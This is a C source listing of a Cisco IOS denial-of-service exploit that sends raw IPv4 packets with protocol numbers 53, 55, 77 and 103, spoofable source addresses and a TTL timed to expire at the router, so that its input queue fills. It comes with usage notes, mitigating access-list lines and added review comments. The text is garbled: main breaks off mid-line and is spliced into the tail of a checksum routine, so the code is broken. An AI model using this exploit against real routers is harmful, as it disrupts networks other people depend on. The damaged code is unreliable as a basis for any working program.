Cisco IOS IPv4 Packet DoS Exploit (cisco-bug-44020.c)
* cisco-bug-44020.tar.gz *
/*******************************************************/
/* cisco-bug-44020.c - Copyright by Martin Kluge () */
/* */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* */
/* This exploit uses the bug in recent IOS versions to stop the router */
/* from processing traffic once the input queue is full. */
/* */
/* */
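/* Use access control lists as described in the CISCO advisory to */
/* protect your cisco routers: */
/* */
/* access-list 101 deny 53 any any */
/* access-list 101 deny 55 any any */
/* access-list 101 deny 77 any any */
/* access-list 101 deny 103 any any */
/* */
/* Note: 53, 55, 77 and 103 are IP protocol numbers, not TCP/UDP */
/* ports (they are the same values as proto[] below). An IOS access */
/* list ends with an implicit deny, so these four lines on their own */
/* would also drop all other traffic; follow the advisory for the */
/* complete list and for where to apply it. */
/* */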
/* This code was only tested on linux, no warranty is or will be */
/* provided. */
/* */
/* Usage: ./cisco-bug-44020 */
/* Source IP: Your source IP (or a spoofed source IP) */
/* Destination IP: The IP of the vulnerable cisco router */
/* Hops: The number of hops between you and the router, */
/* the time to live (ttl) should be 0 when the packet */
/* is received by the cisco router. */
/* Number: Number of packets to send (0 = loop) */
/*******************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* DEBUG is defined unconditionally, so the hop-count trace in main is always compiled in. */
#define DEBUG
/*
 * Fallback for system headers that do not define IPPROTO_RAW.
 * NOTE(review): the fallback value is 0; confirm that it matches the
 * platform's raw-IP protocol constant before relying on it.
 */
#ifndef IPPROTO_RAW
#define IPPROTO_RAW 0
#endif
/*
 * IPv4 header as this program lays it out in memory (no options field).
 *
 * NOTE(review): the four 8-bit members are bit-fields of unsigned int, and
 * bit-field allocation is implementation-defined. The struct matches the
 * 20-byte wire header only where the compiler packs each pair of bit-fields
 * into the two bytes directly ahead of the following unsigned short. The
 * header comment says the code was tested on Linux only.
 * NOTE(review): the multi-byte members presumably have to be stored in
 * network byte order; the code that assigns them is not visible in this
 * listing, so confirm against the original file.
 */
struct ipv4_pkt_header {
unsigned int ipvhl:8; /* Version + Header length */
unsigned int type_service:8; /* TOS(Type of Service) field */
unsigned short packet_len; /* Header+Payload length */
unsigned short ident; /* Identification field */
unsigned short fragment; /* Fragment Offset field */
unsigned int time_live:8; /* TTL(Time to Live) field */
unsigned int protocol:8; /* Protocol field */
unsigned short sum; /* Checksum field */
struct in_addr src_ip; /* Source IP */
struct in_addr dst_ip; /* Destination IP */
};
/*
 * IP protocol numbers handled by this program. They are the same four
 * values that the access-list lines in the header comment deny.
 * NOTE(review): presumably these are the values written into the header's
 * protocol field; the code that reads this table is not visible in this
 * listing.
 */
char proto[] = {
	[0] = 53,
	[1] = 55,
	[2] = 77,
	[3] = 103
};

/* Prototypes */
/* Checksum helper; only the tail of its definition survives in this listing. */
int in_cksum (unsigned short *, int, int);
/*
 * Main function.
 *
 * Requires exactly four command-line arguments (argc == 5): argv[1] and
 * argv[2] are parsed as IPv4 addresses with inet_addr(), argv[3] is the hop
 * count and argv[4] the packet count, both parsed with atoi(). It then opens
 * a raw IPv4 socket and starts to fill in an ipv4_pkt_header.
 *
 * Returns EXIT_FAILURE on a wrong argument count or when the raw socket
 * cannot be opened.
 *
 * NOTE(review): this listing is damaged. The text is cut in the middle of
 * the first header assignment, and the rest of main and the opening of
 * in_cksum() are missing, so the lines that follow cannot be compiled or
 * reviewed as a whole.
 */
int main (int argc, char *argv[]) {
struct ipv4_pkt_header ipv4_hdr;
struct sockaddr_in sin;
struct timeval seed;
unsigned long src_ip, dst_ip;
int fd, hops, count, bytes;
int len=0, i=0, n=0, loop=0;
unsigned char *buf;
/* Check command line args */
if(argc != 5) {
fprintf(stderr, "Usage: %s \n\n", argv[0]);
return(EXIT_FAILURE);
}
/*
 * NOTE(review): inet_addr() reports a malformed address as INADDR_NONE and
 * atoi() has no error reporting; none of the four results is validated in
 * the visible code.
 */
src_ip = inet_addr(argv[1]);
dst_ip = inet_addr(argv[2]);
hops = atoi(argv[3]);
count = atoi(argv[4]);
/* A count of 0 selects loop mode ("0 = loop" in the header comment); count is then forced to 1. */
if(count == 0) { loop=1; count=1; }
#ifdef DEBUG
printf("DEBUG: Hops: %i\n", hops);
#endif
/* Open a raw socket */
/* Raw sockets normally require elevated privileges, so this call is expected to fail for an unprivileged user. */
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
fprintf(stderr, "Error: Cannot open raw socket.\n");
return(EXIT_FAILURE);
}
/* Build the IPv4 header */
/*
 * NOTE(review): the next line is where the listing is damaged. It begins as
 * an assignment in main and ends inside a loop that uses w, nleft and sum,
 * none of which are declared in the visible text. Everything in between is
 * missing from this page.
 */
ipv4_hdr.ipvhl = ((4 1) {
sum += *w++;
nleft -= 2;
}
/*
 * NOTE(review): the remaining lines look like the tail of a 16-bit
 * ones-complement checksum routine (presumably in_cksum, declared above).
 * Its signature, local declarations and loop header are not visible, and the
 * odd-byte line below is also damaged.
 */
/* mop up an odd byte, if necessary */
if (nleft == 1) {
sum += htons(*(unsigned char *)w> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}